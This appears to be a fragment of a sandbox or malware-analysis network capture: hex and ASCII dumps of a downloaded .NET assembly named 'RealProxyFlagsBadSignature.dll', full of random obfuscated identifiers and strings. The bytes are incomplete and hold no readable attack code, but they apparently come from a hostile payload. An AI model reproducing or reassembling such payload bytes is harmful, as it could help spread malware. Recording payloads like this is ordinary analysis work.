                                                                                        Data Ascii: jjkkPffPPHHPllfffhhfmmb++bbYYbnnLWWHHWWLLWW%%WWL
                                                                                        2022-08-08 15:18:38 UTC91INData Raw: 06 00 64 00 6d 0b 06 00 7b 00 6d 0b 12 00 c9 11 4b 0f 06 00 41 0d 6d 0b 06 00 5d 0a 6d 0b 06 00 aa 0c 6d 0b 06 00 bf 12 6d 0b 06 00 38 0f 6d 0b 0a 00 3a 06 9a 0f 06 00 58 07 4b 0f 12 00 89 07 f5 0a 12 00 ca 06 f5 0a 12 00 41 07 12 0e 0a 00 a6 0e 5e 0f 06 00 41 08 4b 0f 0a 00 54 0e 9a 0f 12 00 13 07 df 0b 0a 00 e5 07 59 03 0a 00 cd 07 e3 0f 06 00 91 11 0a 10 06 00 a7 05 6d 0b 06 00 9f 04 6d 0b 06 00 21 0f 6d 0b 0a 00 89 08 59 03 0a 00 0f 00 cb 0a 06 00 a2 07 c4 0f 0e 00 b6 12 25 0d 06 00 39 00 3e 03 06 00 01 00 3e 03 06 00 07 0f 7e 11 06 00 86 04 6d 0b 0e 00 df 06 25 0d 0e 00 ec 04 25 0d 0e 00 fd 03 25 0d 0e 00 0f 12 25 0d 06 00 7a 04 7e 11 06 00 47 00 3e 03 06 00 6a 00 6d 0b 16 00 7b 04 35 0d 06 00 59 08 0a 10 06 00 ea 06 0a 10 12 00 de 04 4b 0f 12 00 92
                                                                                        Data Ascii: dm{mKAm]mmm8m:XKA^AKTYmm!mY%9>>~m%%%%z~G>jm{5YK
                                                                                        2022-08-08 15:18:38 UTC93INData Raw: 08 28 04 02 01 04 00 2c 30 00 00 00 00 06 18 2b 0f 8a 00 04 00 de 2f 00 00 00 00 01 18 2b 0f 8a 00 04 00 44 30 00 00 00 00 16 08 76 09 a9 02 04 00 a4 30 00 00 00 00 16 08 80 09 c0 02 05 00 04 31 00 00 00 00 16 08 8a 09 dc 02 07 00 6c 31 00 00 00 00 16 08 9d 09 f2 02 09 00 cc 31 00 00 00 00 16 08 8a 09 01 03 0c 00 ea 31 00 00 00 00 16 08 9d 09 0a 03 0e 00 f8 31 00 00 00 00 16 00 fd 07 1b 03 11 00 24 32 00 00 00 00 16 00 28 07 33 03 13 00 4c 32 00 00 00 00 16 00 cd 10 49 03 15 00 ac 32 00 00 00 00 16 00 cd 10 bb 03 19 00 20 33 00 00 00 00 16 00 cd 10 2c 04 1d 00 c4 34 00 00 00 00 03 18 2b 0f 77 04 21 00 e4 34 00 00 00 00 03 00 af 12 8e 04 24 00 10 35 00 00 00 00 03 00 17 12 9c 04 25 00 54 35 00 00 00 00 11 18 31 0f 73 00 26 00 be 35 00 00 00 00 06 18 2b 0f
                                                                                        Data Ascii: (,0+/+D0v01l1111$2(3L2I2 3,4+w!4$5%T51s&5+
                                                                                        2022-08-08 15:18:38 UTC94INData Raw: 74 0a 00 00 02 00 e4 03 00 00 03 00 90 0a 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 19 03 00 00 02 00 b2 0a 00 00 03 00 9e 06 00 00 01 00 9b 12 00 00 01 00 19 03 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00 e7 10 00 00 04 00 bc 10 00 00 05 00 a1 10 00 00 06 00 21 11 00 00 07 00 cb 12 00 00 08 00 b3 13 00 00 09 00 dc 0c 00 00 0a 00 1a 0c 00 00 0b 00 b2 0a 00 00 0c 00 9e 06 00 00 01 00 dc 0c 00 00 02 00 1a 0c 00 00 03 00 9b 12 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00 e7 10 00 00 04 00 bc 10 00 00 05 00 a1 10 00 00 06 00 21 11 00 00 07 00 cb 12 00 00 08 00 b3 13 00 00 09 00 dc 0c 00 00 0a 00 1a 0c 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 cc 03 00 00 02 00 65 13 00 00 03 00 b2 0a 00 00 04 00 9e 06 00
                                                                                        Data Ascii: t%%Us!Us!%e
                                                                                        2022-08-08 15:18:38 UTC95INData Raw: 05 41 00 01 12 ea 05 59 00 e8 0c f1 05 49 00 2b 0f 8a 00 b1 01 a9 13 f4 05 a1 01 06 11 01 06 c1 01 d2 0e 07 06 31 00 96 03 0d 06 31 00 2a 0b 8a 00 c1 01 c0 0e 73 00 51 01 27 13 22 06 51 01 02 13 22 06 41 00 d8 13 a1 04 41 00 f5 03 33 06 c9 01 81 06 39 06 19 00 59 11 60 07 c1 00 9c 13 66 07 f1 01 2b 0f 6c 07 11 02 d7 03 e7 07 09 02 2b 0f 8a 00 19 02 2b 0f 85 00 21 02 2b 0f 85 00 29 02 2b 0f 85 00 31 02 2b 0f 85 00 39 02 2b 0f 85 00 41 02 2b 0f 85 00 49 02 2b 0f 85 00 51 02 2b 0f d3 08 61 02 2b 0f e3 08 69 02 2b 0f 8a 00 71 02 2b 0f 85 00 79 02 2b 0f 85 00 51 02 2b 0f 67 09 29 00 b3 00 2f 01 2e 00 7b 03 7a 02 2e 00 83 03 7a 02 2e 00 8b 03 71 08 2e 00 93 03 7a 02 2e 00 9b 03 91 08 2e 00 a3 03 71 08 2e 00 ab 03 bb 08 2e 00 b3 03 da 08 2e 00 2b 01 7a 02 2e 00
                                                                                        Data Ascii: AYI+11*sQ'"Q"AA39Y`f+l++!+)+1+9+A+I+Q+a+i+q+y+Q+g)/.{z.z.q.z..q...+z.
                                                                                        2022-08-08 15:18:38 UTC97INData Raw: 60 31 00 43 6f 6e 74 65 78 74 56 61 6c 75 65 60 31 00 54 68 72 65 61 64 53 61 66 65 4f 62 6a 65 63 74 50 72 6f 76 69 64 65 72 60 31 00 49 45 6e 75 6d 65 72 61 74 6f 72 60 31 00 4c 69 73 74 60 31 00 52 65 73 65 72 76 65 64 31 00 52 65 61 64 49 6e 74 33 32 00 54 6f 49 6e 74 33 32 00 46 75 6e 63 60 32 00 52 65 73 65 72 76 65 64 32 00 49 6e 74 36 34 00 54 6f 49 6e 74 31 36 00 3c 4d 6f 64 75 6c 65 3e 00 67 65 74 45 6e 63 6f 64 69 6e 67 43 4d 53 53 45 43 54 49 4f 4e 45 4e 54 52 59 49 44 4d 45 54 41 44 41 54 41 00 65 72 49 6c 4f 48 6d 54 6a 76 46 55 52 55 42 00 46 7a 52 58 72 4e 58 52 41 46 43 71 5a 51 44 00 73 44 47 57 6a 74 49 6e 6e 65 41 74 76 51 44 00 73 4c 45 58 52 67 6d 42 45 4f 62 4c 7a 6c 44 00 4e 58 6e 64 55 49 50 75 6f 47 50 47 47 42 46 00 68 6c 49 4b
                                                                                        Data Ascii: `1ContextValue`1ThreadSafeObjectProvider`1IEnumerator`1List`1Reserved1ReadInt32ToInt32Func`2Reserved2Int64ToInt16<Module>getEncodingCMSSECTIONENTRYIDMETADATAerIlOHmTjvFURUBFzRXrNXRAFCqZQDsDGWjtInneAtvQDsLEXRgmBEObLzlDNXndUIPuoGPGGBFhlIK
                                                                                        2022-08-08 15:18:38 UTC98INData Raw: 6e 61 6d 65 00 44 61 74 65 54 69 6d 65 00 63 6f 6d 6d 61 6e 64 4c 69 6e 65 00 56 61 6c 75 65 54 79 70 65 00 4e 6f 50 72 69 6e 63 69 70 61 6c 4d 61 6b 65 50 6f 69 6e 74 65 72 54 79 70 65 00 47 65 74 54 79 70 65 00 74 79 70 65 00 53 79 73 74 65 6d 2e 43 6f 72 65 00 52 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 41 74 74 72 69 62 75 74 65 73 43 6c 6f 73 75 72 65 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 00 67 65 74 5f 43 75 6c 74 75 72 65 00 73 65 74 5f 43 75 6c 74 75 72 65 00 72 65 73 6f 75 72 63 65 43 75 6c 74 75 72 65 00 47 65 6e 65 72 69 63 46 69 65 6c 64 49 6e 66 6f 43 6f 64 65 42 61 73 65 00 41 70 70 6c 69 63 61 74 69 6f 6e 42 61 73 65 00 52 65 61 64 4f 6e 6c 79 43 6f 6c 6c 65 63 74 69 6f 6e 42 61 73 65 00 41 70 70
                                                                                        Data Ascii: nameDateTimecommandLineValueTypeNoPrincipalMakePointerTypeGetTypetypeSystem.CoreRemoveNamespaceAttributesClosureRealProxyFlagsBadSignatureget_Cultureset_CultureresourceCultureGenericFieldInfoCodeBaseApplicationBaseReadOnlyCollectionBaseApp
                                                                                        2022-08-08 15:18:38 UTC99INData Raw: 62 61 63 6b 00 4d 61 72 73 68 61 6c 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 4d 79 53 65 72 76 69 63 65 73 2e 49 6e 74 65 72 6e 61 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 64 6c 6c 00 4b 69 6c 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 73 65 74 41 73 42 6f 6f 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 55 43 4f 4d 49 53 74 72 65 61 6d 00 65 6c 65 6d 00 67 65 74 5f 49 74 65 6d 00 53 79 73 74 65 6d 00 55 48 47 49 55 66 4c 6a 59 49 49 4a 72 75 74 46 43 50 72 5a 4e 6d 73 4b 4a 63 47 67 5a 4e 44 68 72 66 4d 68 4f 56 4e 65 46 54 52 72 43 4a 4b 62 54 66 63 75 4d 66 43 69 6a 77 7a 4d 5a 66 65 4b 45 77 52 4d 44 4d 4d 43 42
                                                                                        Data Ascii: backMarshalMicrosoft.VisualBasic.MyServices.InternalSystem.ComponentModelRealProxyFlagsBadSignature.dllKillMemoryBarriersetAsBoolMemoryBarrierUCOMIStreamelemget_ItemSystemUHGIUfLjYIIJrutFCPrZNmsKJcGgZNDhrfMhOVNeFTRrCJKbTfcuMfCijwzMZfeKEwRMDMMCB
                                                                                        2022-08-08 15:18:38 UTC101INData Raw: 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 4d 79 2e 52 65 73 6f 75 72 63 65 73 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 52 65 73 6f 75 72 63 65 73 2e 72 65 73 6f 75 72 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 69 6e 68 65 72 69 74 48 61 6e 64 6c 65 73 00 67 65 74 5f 4d 6f 64 75 6c 65 73 00 74 68 72 65 61 64 41 74 74 72 69 62 75 74 65 73 00 52 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 41 74 74 72 69 62 75 74 65 73 00 70 72 6f 63 65 73 73 41 74 74 72 69 62 75 74 65 73 00 6d 5f 61 74 74 72 69 62 75 74 65 73 00 47 65 74 42 79 74 65 73 00 6d 5f 69 6e 53 63 6f
                                                                                        Data Ascii: e.CompilerServicesSystem.ResourcesRealProxyFlagsBadSignature.My.ResourcesRealProxyFlagsBadSignature.Resources.resourcesDebuggingModesinheritHandlesget_ModulesthreadAttributesRemoveNamespaceAttributesprocessAttributesm_attributesGetBytesm_inSco
                                                                                        2022-08-08 15:18:38 UTC102INData Raw: 76 00 53 00 6a 00 5a 00 51 00 63 00 47 00 6a 00 44 00 4f 00 74 00 42 00 55 00 64 00 74 00 76 00 6b 00 6a 00 58 00 64 00 6f 00 46 00 46 00 63 00 4b 00 6b 00 70 00 55 00 4a 00 48 00 46 00 7a 00 58 00 48 00 65 00 63 00 61 00 42 00 72 00 64 00 6c 00 4f 00 4b 00 4e 00 4f 00 50 00 5a 00 41 00 79 00 72 00 65 00 4d 00 75 00 47 00 49 00 55 00 4c 00 78 00 7a 00 53 00 53 00 57 00 42 00 46 00 76 00 6f 00 47 00 6d 00 46 00 72 00 79 00 74 00 48 00 6e 00 76 00 74 00 7a 00 4d 00 6e 00 72 00 69 00 6e 00 79 00 75 00 76 00 53 00 6a 00 5a 00 51 00 63 00 47 00 6a 00 44 00 4f 00 74 00 42 00 55 00 64 00 74 00 76 00 6b 00 6a 00 58 00 64 00 6f 00 46 00 46 00 63 00 4b 00 6b 00 70 00 55 00 4a 00 48 00 46 00 7a 00 58 00 48 00 65 00 63 00 61 00 42 00 72 00 64 00 6c 00 4f 00 4b 00 4e
                                                                                        Data Ascii: vSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKNOPZAyreMuGIULxzSSWBFvoGmFrytHnvtzMnrinyuvSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKN
                                                                                        2022-08-08 15:18:38 UTC103INData Raw: 00 54 00 77 00 41 00 44 00 51 00 70 00 41 00 6d 00 59 00 7a 00 4b 00 72 00 7a 00 6b 00 50 00 67 00 77 00 4a 00 42 00 4d 00 64 00 6f 00 57 00 52 00 47 00 6e 00 53 00 4a 00 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 65 00 6e 00 72 00 65 00 79 00 6e 00 4c 00 74 00 77 00 64 00 46 00 42 00 6f 00 6a 00 6f 00 54 00 68 00 6c 00 4a 00 6a 00 4e 00 4d 00 51 00 53 00 55 00 48 00 4a 00 62 00 79 00 51 00 67 00 51 00 41 00 63 00 46 00 55 00 52 00 6b 00 7a 00 72 00 51 00 45 00 49 00 6b 00 48 00 41 00 72 00 6c 00 54 00 77 00 41 00 44 00 51 00 70 00 41 00 6d 00 59 00 7a 00 4b 00 72 00 7a 00 6b 00 50 00 67 00 77 00 4a 00 42 00 4d 00 64 00 6f 00 57 00 52 00 47 00 6e 00 53 00 4a 00 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 6b 00 00 80 a3 79 00 6e 00 4c
                                                                                        Data Ascii: TwADQpAmYzKrzkPgwJBMdoWRGnSJYggTPXcCkenreynLtwdFBojoThlJjNMQSUHJbyQgQAcFURkzrQEIkHArlTwADQpAmYzKrzkPgwJBMdoWRGnSJYggTPXcCkkynL
                                                                                        2022-08-08 15:18:38 UTC104INData Raw: 51 00 72 00 62 00 71 00 79 00 42 00 43 00 64 00 4c 00 50 00 74 00 55 00 55 00 77 00 6b 00 43 00 55 00 76 00 52 00 76 00 4a 00 50 00 54 00 6f 00 4f 00 53 00 47 00 50 00 50 00 65 00 74 00 61 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67 00 45 00 49 00 69 00 4a 00 77 00 66 00 73 00 5a 00 50 00 58 00 50 00 73 00 70 00 79 00 67 00 50 00 55 00 4e 00 6e 00 69 00 6a 00 54 00 46 00 6a 00 4e 00 65 00 46 00 45 00 4b 00 52 00 45 00 41 00 75 00 6a 00 69 00 65 00 64 00 58 00 4d 00 73 00 69 00 51 00 72 00 62 00 71 00 79 00 42 00 43 00 64 00 4c 00 50 00 74 00 55 00 55 00 77 00 6b 00 43 00 55 00 76 00 52 00 76 00 4a 00 50 00 54 00 6f 00 4f 00 53 00 47 00 50 00 65 00 72 00 43 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67
                                                                                        Data Ascii: QrbqyBCdLPtUUwkCUvRvJPToOSGPPetazkqrgJGklnDgEIiJwfsZPXPspygPUNnijTFjNeFEKREAujiedXMsiQrbqyBCdLPtUUwkCUvRvJPToOSGPerCzkqrgJGklnDg
                                                                                        2022-08-08 15:18:38 UTC106INData Raw: 00 68 00 46 00 41 00 4f 00 44 00 6d 00 62 00 46 00 64 00 4b 00 59 00 44 00 6c 00 46 00 76 00 65 00 47 00 00 80 a3 58 00 47 00 52 00 41 00 50 00 56 00 53 00 78 00 79 00 4f 00 6a 00 63 00 58 00 62 00 54 00 42 00 4b 00 41 00 5a 00 48 00 53 00 63 00 65 00 78 00 75 00 53 00 74 00 42 00 74 00 49 00 77 00 67 00 76 00 6d 00 61 00 45 00 54 00 73 00 5a 00 55 00 64 00 49 00 59 00 62 00 4c 00 4b 00 58 00 43 00 51 00 52 00 64 00 4f 00 4e 00 55 00 53 00 76 00 63 00 70 00 61 00 53 00 77 00 52 00 44 00 71 00 52 00 44 00 68 00 46 00 41 00 4f 00 44 00 6d 00 62 00 46 00 64 00 4b 00 59 00 44 00 6c 00 46 00 76 00 00 82 a9 74 00 78 00 4c 00 46 00 77 00 65 00 69 00 6e 00 61 00 55 00 41 00 78 00 79 00 52 00 63 00 74 00 4d 00 45 00 68 00 4a 00 64 00 63 00 6e 00 42 00 58 00 4f 00
                                                                                        Data Ascii: hFAODmbFdKYDlFveGXGRAPVSxyOjcXbTBKAZHScexuStBtIwgvmaETsZUdIYbLKXCQRdONUSvcpaSwRDqRDhFAODmbFdKYDlFvtxLFweinaUAxyRctMEhJdcnBXO
                                                                                        2022-08-08 15:18:38 UTC107INData Raw: 42 00 4a 00 74 00 4b 00 51 00 43 00 57 00 65 00 6f 00 43 00 64 00 61 00 65 00 77 00 50 00 59 00 41 00 67 00 52 00 4e 00 6b 00 76 00 7a 00 74 00 73 00 63 00 46 00 72 00 74 00 4e 00 4f 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48 00 45 00 64 00 52 00 59 00 53 00 48 00 44 00 55 00 6f 00 63 00 4d 00 79 00 6a 00 70 00 4e 00 41 00 61 00 79 00 79 00 49 00 65 00 65 00 6e 00 72 00 65 00 53 00 76 00 59 00 79 00 51 00 41 00 59 00 43 00 47 00 42 00 52 00 43 00 55 00 61 00 70 00 42 00 57 00 61 00 46 00 57 00 42 00 4a 00 74 00 4b 00 51 00 43 00 57 00 65 00 72 00 68 00 54 00 74 00 65 00 47 00 77 00 50 00 59 00 41 00 67 00 52 00 4e 00 6b 00 76 00 7a 00 74 00 73 00 63 00 46 00 72 00 74 00 4e 00 4f 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48
                                                                                        Data Ascii: BJtKQCWeoCdaewPYAgRNkvztscFrtNOztOXRHVHPHEdRYSHDUocMyjpNAayyIeenreSvYyQAYCGBRCUapBWaFWBJtKQCWerhTteGwPYAgRNkvztscFrtNOztOXRHVHPH
                                                                                        2022-08-08 15:18:38 UTC109INData Raw: 00 56 00 5a 00 6d 00 74 00 65 00 53 00 34 00 36 00 63 00 78 00 76 00 4c 00 5a 00 50 00 41 00 68 00 65 00 72 00 58 00 78 00 6f 00 52 00 64 00 4a 00 51 00 53 00 46 00 58 00 49 00 47 00 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75 00 5a 00 64 00 47 00 47 00 64 00 61 00 61 00 49 00 72 00 7a 00 44 00 64 00 44 00 46 00 42 00 45 00 50 00 53 00 77 00 55 00 56 00 56 00 6f 00 71 00 64 00 5a 00 6c 00 4d 00 67 00 6c 00 4b 00 6e 00 54 00 4f 00 72 00 7a 00 44 00 4a 00 4b 00 41 00 53 00 41 00 6a 00 64 00 56 00 5a 00 6d 00 77 00 6f 00 57 00 00 80 a3 63 00 78 00 76 00 4c 00 5a 00 50 00 41 00 68 00 65 00 72 00 58 00 78 00 6f 00 52 00 64 00 4a 00 51 00 53 00 46 00 58 00 49 00 47 00 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75
                                                                                        Data Ascii: VZmteS46cxvLZPAherXxoRdJQSFXIGIEhVdIBOhjduZdGGdaaIrzDdDFBEPSwUVVoqdZlMglKnTOrzDJKASAjdVZmwoWcxvLZPAherXxoRdJQSFXIGIEhVdIBOhjdu
                                                                                        2022-08-08 15:18:38 UTC110INData Raw: 6f 00 6d 00 65 00 4d 00 69 00 6e 00 52 00 64 00 57 00 6a 00 49 00 4b 00 75 00 4c 00 6e 00 76 00 6e 00 52 00 44 00 47 00 41 00 4d 00 45 00 46 00 71 00 48 00 6d 00 4b 00 71 00 4f 00 56 00 6c 00 7a 00 58 00 69 00 4e 00 77 00 6c 00 55 00 6f 00 48 00 4b 00 77 00 41 00 6d 00 47 00 66 00 47 00 50 00 4d 00 47 00 54 00 51 00 4d 00 6c 00 56 00 54 00 4b 00 41 00 61 00 42 00 47 00 6d 00 64 00 4f 00 57 00 66 00 58 00 64 00 76 00 79 00 43 00 53 00 50 00 79 00 4c 00 50 00 44 00 54 00 6a 00 78 00 42 00 50 00 79 00 49 00 73 00 73 00 69 00 6e 00 52 00 64 00 57 00 6a 00 49 00 4b 00 75 00 4c 00 6e 00 76 00 6e 00 52 00 44 00 47 00 41 00 4d 00 45 00 46 00 71 00 48 00 6d 00 4b 00 71 00 4f 00 56 00 6c 00 7a 00 58 00 69 00 4e 00 77 00 6c 00 55 00 6f 00 48 00 4b 00 77 00 41 00 6d
                                                                                        Data Ascii: omeMinRdWjIKuLnvnRDGAMEFqHmKqOVlzXiNwlUoHKwAmGfGPMGTQMlVTKAaBGmdOWfXdvyCSPyLPDTjxBPyIssinRdWjIKuLnvnRDGAMEFqHmKqOVlzXiNwlUoHKwAm
                                                                                        2022-08-08 15:18:38 UTC111INData Raw: 00 74 00 4e 00 42 00 71 00 6d 00 47 00 68 00 74 00 48 00 46 00 74 00 48 00 42 00 58 00 6f 00 6c 00 6b 00 76 00 64 00 63 00 55 00 4f 00 44 00 42 00 41 00 6a 00 76 00 46 00 51 00 4c 00 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74 00 64 00 53 00 6e 00 77 00 6d 00 45 00 49 00 54 00 74 00 76 00 6b 00 45 00 41 00 70 00 59 00 66 00 63 00 64 00 51 00 6f 00 50 00 48 00 70 00 6a 00 54 00 5a 00 69 00 43 00 4e 00 4c 00 6e 00 42 00 46 00 63 00 73 00 51 00 49 00 65 00 00 80 a3 42 00 71 00 6d 00 47 00 68 00 74 00 48 00 46 00 74 00 48 00 42 00 58 00 6f 00 6c 00 6b 00 76 00 64 00 63 00 55 00 4f 00 44 00 42 00 41 00 6a 00 76 00 46 00 51 00 4c 00 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74
                                                                                        Data Ascii: tNBqmGhtHFtHBXolkvdcUODBAjvFQLRyALIVhBOQQBMStdSnwmEITtvkEApYfcdQoPHpjTZiCNLnBFcsQIeBqmGhtHFtHBXolkvdcUODBAjvFQLRyALIVhBOQQBMSt
                                                                                        2022-08-08 15:18:38 UTC113INData Raw: 42 00 6c 00 51 00 71 00 50 00 44 00 65 00 48 00 76 00 56 00 70 00 77 00 52 00 77 00 71 00 47 00 66 00 6c 00 76 00 4a 00 6e 00 46 00 44 00 51 00 4c 00 5a 00 47 00 53 00 47 00 69 00 46 00 4c 00 48 00 68 00 72 00 75 00 48 00 58 00 41 00 48 00 6f 00 63 00 74 00 70 00 73 00 58 00 51 00 77 00 61 00 4c 00 6f 00 7a 00 49 00 4e 00 70 00 52 00 68 00 55 00 66 00 4b 00 53 00 68 00 57 00 4d 00 6b 00 65 00 6f 00 45 00 46 00 51 00 72 00 68 00 54 00 4e 00 7a 00 4e 00 59 00 51 00 53 00 55 00 6c 00 6a 00 57 00 63 00 42 00 6c 00 51 00 71 00 50 00 44 00 65 00 48 00 76 00 56 00 70 00 77 00 52 00 77 00 71 00 47 00 66 00 6c 00 76 00 4a 00 6e 00 46 00 44 00 51 00 4c 00 5a 00 47 00 53 00 47 00 69 00 46 00 4c 00 48 00 68 00 72 00 75 00 48 00 58 00 41 00 48 00 6f 00 63 00 74 00 70
                                                                                        Data Ascii: BlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctp
                                                                                        2022-08-08 15:18:38 UTC114INData Raw: 01 01 1e 00 1e 00 04 07 01 1e 00 07 30 01 01 01 10 1e 00 07 20 04 01 0e 0e 0e 0e 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 65 72 76 69 63 65 73 2e 50 72 6f 74 6f 63 6f 6c 73 2e 53 6f 61 70 48 74 74 70 43 6c 69 65 6e 74 50 72 6f 74 6f 63 6f 6c 12 43 72 65 61 74 65 5f 5f 49 6e 73 74 61 6e 63 65 5f 5f 13 44 69 73 70 6f 73 65 5f 5f 49 6e 73 74 61 6e 63 65 5f 5f 00 00 00 07 06 15 12 71 01 13 00 09 07 04 13 00 13 00 13 00 02 06 15 12 18 01 13 00 06 15 12 71 01 13 00 02 13 00 04 0a 01 13 00 05 20 01 01 13 00 04 28 00 13 00 04 20 01 01 02 05 01 00 00 00 00 0c 07 04 0e 12 79 15 12 7d 01 12 79 02 07 15 12 80 81 01 12 79 08 20 00 15 12 7d 01 13 00 06 15 12 7d 01 12 79 03 20 00 02 0a 00 01 0e 15 12 80 81 01 12 79 0b 07 03 12 79 15 12 7d 01 12 79 02 0b 00 02 01
                                                                                        Data Ascii: 0 a4System.Web.Services.Protocols.SoapHttpClientProtocolCreate__Instance__Dispose__Instance__qq ( y}yy }}y yy}y
                                                                                        2022-08-08 15:18:38 UTC115INData Raw: 80 ed 18 08 08 08 08 12 80 f1 1c 08 20 05 08 18 08 08 08 08 0a 20 03 12 80 ed 18 12 80 f1 1c 04 20 01 08 18 02 06 09 03 06 1d 05 02 1e 24 04 06 12 80 f9 04 06 12 80 fd 09 07 03 12 80 f9 12 80 f9 02 05 00 02 02 1c 1c 05 20 00 12 81 01 07 20 02 01 0e 12 81 01 05 00 00 12 80 f9 05 07 01 12 80 fd 05 00 00 12 80 fd 06 00 01 01 12 80 fd 05 08 00 12 80 f9 08 01 00 02 00 00 00 00 00 05 08 00 12 80 fd 40 01 00 33 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 54 6f 6f 6c 73 2e 53 74 72 6f 6e 67 6c 79 54 79 70 65 64 52 65 73 6f 75 72 63 65 42 75 69 6c 64 65 72 07 34 2e 30 2e 30 2e 30 00 00 03 06 12 60 08 00 01 12 81 09 12 81 09 04 07 01 12 60 04 00 00 12 60 04 08 00 12 60 59 01 00 4b 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 53 74 75 64 69 6f 2e 45 64 69
                                                                                        Data Ascii: $ @3System.Resources.Tools.StronglyTypedResourceBuilder4.0.0.0````YKMicrosoft.VisualStudio.Edi
                                                                                        2022-08-08 15:18:38 UTC117INData Raw: 00 00 00 01 00 00 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 c8 01 00 00 18 e5 00 00 28 01 00 00 00 00 00 00 00 00 00 00 40 e6 00 00 68 05 00 00 00 00 00 00 00 00 00 00 a8 eb 00 00 68 04 00 00 00 00 00 00 00 00 00 00 10 f0 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 f8 f2 00 00 a8 08 00 00 00 00 00 00 00 00 00 00 a0 fb 00 00 a8 10 00 00 00 00 00 00 00 00 00 00 48 0c 01 00 5a 00 00 00 00 00 00 00 00 00 00 00 d8 e1 00 00 40 03 00 00 00 00
                                                                                        Data Ascii: x(@hhHZ@
                                                                                        2022-08-08 15:18:38 UTC118INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 42 42 42 00 f1 ef f0 00 f6 f6 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: ( BBB
